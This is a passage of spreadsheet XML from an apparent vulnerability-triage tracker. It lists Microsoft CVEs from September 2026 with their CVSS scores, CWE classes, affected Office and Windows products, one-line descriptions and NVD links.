t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q158" s="5" t="inlineStr" /><c r="R158" s="5" t="inlineStr"><is><t>CWE-131</t></is></c><c r="S158" s="5" t="inlineStr"><is><t>Incorrect calculation of buffer size in Windows iSCSI allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T158" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69598</t></is></c></row><row r="159"><c r="A159" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B159" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C159" s="5" t="inlineStr"><is><t>CVE-2026-69601</t></is></c><c r="D159" s="5" t="n"><v>8.800000000000001</v></c><c r="E159" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F159" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G159" s="5" t="inlineStr" /><c r="H159" s="5" t="n"><v>0.008</v></c><c r="I159" s="5" t="inlineStr" /><c r="J159" s="5" t="inlineStr" /><c r="K159" s="5" t="inlineStr" /><c r="L159" s="5" t="inlineStr" /><c r="M159" s="5" t="inlineStr" /><c r="N159" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O159" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P159" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q159" s="5" t="inlineStr" /><c r="R159" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S159" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T159" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69601</t></is></c></row><row r="160"><c r="A160" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B160" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C160" s="5" t="inlineStr"><is><t>CVE-2026-69603</t></is></c><c r="D160" s="5" t="n"><v>8.800000000000001</v></c><c r="E160" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F160" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G160" s="5" t="inlineStr" /><c r="H160" s="5" t="n"><v>0.003</v></c><c r="I160" s="5" t="inlineStr" /><c r="J160" s="5" t="inlineStr" /><c r="K160" s="5" t="inlineStr" /><c r="L160" s="5" t="inlineStr" /><c r="M160" s="5" t="inlineStr" /><c r="N160" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O160" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P160" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q160" s="5" t="inlineStr" /><c r="R160" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S160" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Hyper-V allows an authorized attacker to execute code locally.</t></is></c><c r="T160" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69603</t></is></c></row><row r="161"><c r="A161" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B161" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C161" s="5" t="inlineStr"><is><t>CVE-2026-69614</t></is></c><c r="D161" s="5" t="n"><v>8.800000000000001</v></c><c r="E161" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F161" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G161" s="5" t="inlineStr" /><c r="H161" s="5" t="n"><v>0.008999999999999999</v></c><c r="I161" s="5" t="inlineStr" /><c r="J161" s="5" t="inlineStr" /><c r="K161" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:access, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L161" s="5" t="inlineStr" /><c r="M161" s="5" t="inlineStr" /><c r="N161" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O161" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P161" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q161" s="5" t="inlineStr" /><c r="R161" s="5" t="inlineStr"><is><t>CWE-121, CWE-20</t></is></c><c r="S161" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T161" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69614</t></is></c></row><row r="162"><c r="A162" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B162" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C162" s="5" t="inlineStr"><is><t>CVE-2026-69628</t></is></c><c r="D162" s="5" t="n"><v>8.800000000000001</v></c><c r="E162" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F162" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G162" s="5" t="inlineStr" /><c r="H162" s="5" t="n"><v>0.008999999999999999</v></c><c r="I162" s="5" t="inlineStr" /><c r="J162" s="5" t="inlineStr" /><c r="K162" s="5" t="inlineStr" /><c r="L162" s="5" t="inlineStr" /><c r="M162" s="5" t="inlineStr" /><c r="N162" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O162" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P162" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q162" s="5" t="inlineStr" /><c r="R162" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S162" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows iSCSI allows an authorized attacker to execute code over a network.</t></is></c><c r="T162" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69628</t></is></c></row><row r="163"><c r="A163" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B163" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C163" s="5" t="inlineStr"><is><t>CVE-2026-69629</t></is></c><c r="D163" s="5" t="n"><v>8.800000000000001</v></c><c r="E163" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F163" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G163" s="5" t="inlineStr" /><c r="H163" s="5" t="n"><v>0.008</v></c><c r="I163" s="5" t="inlineStr" /><c r="J163" s="5" t="inlineStr" /><c r="K163" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t></is></c><c r="L163" s="5" t="inlineStr" /><c r="M163" s="5" t="inlineStr" /><c r="N163" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O163" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P163" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q163" s="5" t="inlineStr" /><c r="R163" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S163" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T163" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69629</t></is></c></row><row r="164"><c r="A164" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B164" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C164" s="5" t="inlineStr"><is><t>CVE-2026-69632</t></is></c><c r="D164" s="5" t="n"><v>8.800000000000001</v></c><c r="E164" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F164" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G164" s="5" t="inlineStr" /><c r="H164" s="5" t="n"><v>0.008</v></c><c r="I164" s="5" t="inlineStr" /><c r="J164" s="5" t="inlineStr" /><c r="K164" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L164" s="5" t="inlineStr" /><c r="M164" s="5" t="inlineStr" /><c r="N164" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O164" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P164" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q164" s="5" t="inlineStr" /><c r="R164" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S164" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T164" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69632</t></is></c></row><row r="165"><c r="A165" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B165" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C165" s="5" t="inlineStr"><is><t>CVE-2026-69649</t></is></c><c r="D165" s="5" t="n"><v>8.800000000000001</v></c><c r="E165" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F165" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G165" s="5" t="inlineStr" /><c r="H165" s="5" t="n"><v>0.008</v></c><c r="I165" s="5" t="inlineStr" /><c r="J165" s="5" t="inlineStr" /><c r="K165" s="5" t="inlineStr" /><c r="L165" s="5" t="inlineStr" /><c r="M165" s="5" t="inlineStr" /><c r="N165" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O165" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P165" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q165" s="5" t="inlineStr" /><c r="R165" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S165" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Raw Image Extension allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T165" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69649</t></is></c></row><row r="166"><c r="A166" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B166" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C166" s="5" t="inlineStr"><is><t>CVE-2026-69669</t></is></c><c r="D166" s="5" t="n"><v>8.800000000000001</v></c><c r="E166" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F166" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G166" s="5" t="inlineStr" /><c r="H166" s="5" t="n"><v>0.008</v></c><c r="I166" s="5" t="inlineStr" /><c r="J166" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1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66" s="5" t="inlineStr" /><c r="M166" s="5" t="inlineStr" /><c r="N166" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O166" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P166" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q166" s="5" t="inlineStr" /><c r="R166" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S166" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Kernel allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T166" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69669</t></is></c></row><row r="167"><c r="A167" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B167" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C167" s="5" t="inlineStr"><is><t>CVE-2026-69671</t></is></c><c r="D167" s="5" t="n"><v>8.800000000000001</v></c><c r="E167" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F167" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G167" s="5" t="inlineStr" /><c r="H167" s="5" t="n"><v>0.008</v></c><c r="I167" s="5" t="inlineStr" /><c r="J167" s="5" t="inlineStr" /><c r="K167" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L167" s="5" t="inlineStr" /><c r="M167" s="5" t="inlineStr" /><c r="N167" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O167" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P167" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q167" s="5" t="inlineStr" /><c r="R167" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S167" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T167" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69671</t></is></c></row><row r="168"><c r="A168" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B168" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C168" s="5" t="inlineStr"><is><t>CVE-2026-69676</t></is></c><c r="D168" s="5" t="n"><v>8.800000000000001</v></c><c r="E168" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F168" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G168" s="5" t="inlineStr" /><c r="H168" s="5" t="n"><v>0.012</v></c><c r="I168" s="5" t="inlineStr" /><c r="J168" s="5" t="inlineStr" /><c r="K168" s="5" t="inlineStr" /><c r="L168" s="5" t="inlineStr" /><c r="M168" s="5" t="inlineStr" /><c r="N168" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O168" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P168" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q168" s="5" t="inlineStr" /><c r="R168" s="5" t="inlineStr"><is><t>CWE-294</t></is></c><c r="S168" s="5" t="inlineStr"><is><t>Authentication bypass by capture-replay in Windows Kerberos allows an authorized attacker to execute code over a network.</t></is></c><c r="T168" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69676</t></is></c></row><row r="169"><c r="A169" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B169" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C169" s="5" t="inlineStr"><is><t>CVE-2026-69678</t></is></c><c r="D169" s="5" t="n"><v>8.800000000000001</v></c><c r="E169" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F169" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G169" s="5" t="inlineStr" /><c r="H169" s="5" t="n"><v>0.008</v></c><c r="I169" s="5" t="inlineStr" /><c r="J169" s="5" t="inlineStr" /><c r="K169" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L169" s="5" t="inlineStr" /><c r="M169" s="5" t="inlineStr" /><c r="N169" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O169" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P169" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q169" s="5" t="inlineStr" /><c r="R169" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S169" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T169" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69678</t></is></c></row><row r="170"><c r="A170" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B170" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C170" s="5" t="inlineStr"><is><t>CVE-2026-69686</t></is></c><c r="D170" s="5" t="n"><v>8.800000000000001</v></c><c r="E170" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F170" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G170" s="5" t="inlineStr" /><c r="H170" s="5" t="n"><v>0.008</v></c><c r="I170" s="5" t="inlineStr" /><c r="J170" s="5" t="inlineStr" /><c r="K170" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L170" s="5" t="inlineStr" /><c r="M170" s="5" t="inlineStr" /><c r="N170" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O170" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P170" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q170" s="5" t="inlineStr" /><c r="R170" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S170" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T170" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69686</t></is></c></row><row r="171"><c r="A171" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B171" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C171" s="5" t="inlineStr"><is><t>CVE-2026-69712</t></is></c><c r="D171" s="5" t="n"><v>8.800000000000001</v></c><c r="E171" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F171" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G171" s="5" t="inlineStr" /><c r="H171" s="5" t="n"><v>0.008999999999999999</v></c><c r="I171" s="5" t="inlineStr" /><c r="J171" s="5" t="inlineStr" /><c r="K171" s="5" t="inlineStr" /><c r="L171" s="5" t="inlineStr" /><c r="M171" s="5" t="inlineStr" /><c r="N171" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O171" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P171" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q171" s="5" t="inlineStr" /><c r="R171" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S171" s="5" t="inlineStr"><is><t>Use after free in Windows Key Distribution Center allows an authorized attacker to execute code over a network.</t></is></c><c r="T171" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69712</t></is></c></row><row r="172"><c r="A172" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B172" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C172" s="5" t="inlineStr"><is><t>CVE-2026-69716</t></is></c><c r="D172" s="5" t="n"><v>8.800000000000001</v></c><c r="E172" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F172" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G172" s="5" t="inlineStr" /><c r="H172" s="5" t="n"><v>0.008999999999999999</v></c><c r="I172" s="5" t="inlineStr" /><c r="J172" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K172" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L172" s="5" t="inlineStr" /><c r="M172" s="5" t="inlineStr" /><c r="N172" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O172" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P172" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q172" s="5" t="inlineStr" /><c r="R172" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S172" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T172" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69716</t></is></c></row><row r="173"><c r="A173" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B173" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C173" s="5" t="inlineStr"><is><t>CVE-2026-69722</t></is></c><c r="D173" s="5" t="n"><v>8.800000000000001</v></c><c r="E173" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F173" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G173" s="5" t="inlineStr" /><c r="H173" s="5" t="n"><v>0.008</v></c><c r="I173" s="5" t="inlineStr" /><c r="J173" s="5" t="inlineStr" /><c r="K173" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L173" s="5" t="inlineStr" /><c r="M173" s="5" t="inlineStr" /><c r="N173" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O173" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P173" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q173" s="5" t="inlineStr" /><c r="R173" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S173" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T173" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69722</t></is></c></row><row r="174"><c r="A174" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B174" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C174" s="5" t="inlineStr"><is><t>CVE-2026-69724</t></is></c><c r="D174" s="5" t="n"><v>8.800000000000001</v></c><c r="E174" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F174" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G174" s="5" t="inlineStr" /><c r="H174" s="5" t="n"><v>0.008</v></c><c r="I174" s="5" t="inlineStr" /><c r="J174" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K174" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L174" s="5" t="inlineStr" /><c r="M174" s="5" t="inlineStr" /><c r="N174" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O174" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P174" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q174" s="5" t="inlineStr" /><c r="R174" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S174" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t></is></c><c r="T174" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69724</t></is></c></row><row r="175"><c r="A175" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B175" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C175" s="5" t="inlineStr"><is><t>CVE-2026-69729</t></is></c><c r="D175" s="5" t="n"><v>8.800000000000001</v></c><c r="E175" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F175" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G175" s="5" t="inlineStr" /><c r="H175" s="5" t="n"><v>0.008999999999999999</v></c><c r="I175" s="5" t="inlineStr" /><c r="J175" s="5" t="inlineStr" /><c r="K175" s="5" t="inlineStr" /><c r="L175" s="5" t="inlineStr" /><c r="M175" s="5" t="inlineStr" /><c r="N175" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O175" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P175" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q175" s="5" t="inlineStr" /><c r="R175" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S175" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Credential Providers allows an authorized attacker to execute code over a network.</t></is></c><c r="T175" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69729</t></is></c></row><row r="176"><c r="A176" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B176" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C176" s="5" t="inlineStr"><is><t>CVE-2026-69740</t></is></c><c r="D176" s="5" t="n"><v>8.800000000000001</v></c><c r="E176" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F176" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G176" s="5" t="inlineStr" /><c r="H176" s="5" t="n"><v>0.003</v></c><c r="I176" s="5" t="inlineStr" /><c r="J176" s="5" t="inlineStr" /><c r="K176" s="5" t="inlineStr" /><c r="L176" s="5" t="inlineStr" /><c r="M176" s="5" t="inlineStr" /><c r="N176" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O176" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P176" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q176" s="5" t="inlineStr" /><c r="R176" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S176" s="5" t="inlineStr"><is><t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T176" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69740</t></is></c></row><row r="177"><c r="A177" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B177" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C177" s="5" t="inlineStr"><is><t>CVE-2026-69742</t></is></c><c r="D177" s="5" t="n"><v>8.800000000000001</v></c><c r="E177" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F177" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G177" s="5" t="inlineStr" /><c r="H177" s="5" t="n"><v>0.008</v></c><c r="I177" s="5" t="inlineStr" /><c r="J177" s="5" t="inlineStr" /><c r="K177" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:publisher</t></is></c><c r="L177" s="5" t="inlineStr" /><c r="M177" s="5" t="inlineStr" /><c r="N177" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O177" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P177" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q177" s="5" t="inlineStr" /><c r="R177" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S177" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Office Publisher allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T177" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69742</t></is></c></row><row r="178"><c r="A178" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B178" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C178" s="5" t="inlineStr"><is><t>CVE-2026-69759</t></is></c><c r="D178" s="5" t="n"><v>8.800000000000001</v></c><c r="E178" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F178" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G178" s="5" t="inlineStr" /><c r="H178" s="5" t="n"><v>0.008</v></c><c r="I178" s="5" t="inlineStr" /><c r="J178" s="5" t="inlineStr" /><c r="K178" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L178" s="5" t="inlineStr" /><c r="M178" s="5" t="inlineStr" /><c r="N178" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O178" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P178" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q178" s="5" t="inlineStr" /><c r="R178" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S178" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T178" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69759</t></is></c></row><row r="179"><c r="A179" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B179" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C179" s="5" t="inlineStr"><is><t>CVE-2026-69764</t></is></c><c r="D179" s="5" t="n"><v>8.800000000000001</v></c><c r="E179" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F179" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G179" s="5" t="inlineStr" /><c r="H179" s="5" t="n"><v>0.008</v></c><c r="I179" s="5" t="inlineStr" /><c r="J179" s="5" t="inlineStr" /><c r="K179" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L179" s="5" t="inlineStr" /><c r="M179" s="5" t="inlineStr" /><c r="N179" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O179" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P179" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q179" s="5" t="inlineStr" /><c r="R179" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S179" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T179" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69764</t></is></c></row><row r="180"><c r="A180" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B180" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C180" s="5" t="inlineStr"><is><t>CVE-2026-69767</t></is></c><c r="D180" s="5" t="n"><v>8.800000000000001</v></c><c r="E180" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F180" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G180" s="5" t="inlineStr" /><c r="H180" s="5" t="n"><v>0.008</v></c><c r="I180" s="5" t="inlineStr" /><c r="J180" s="5" t="inlineStr" /><c r="K180" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, 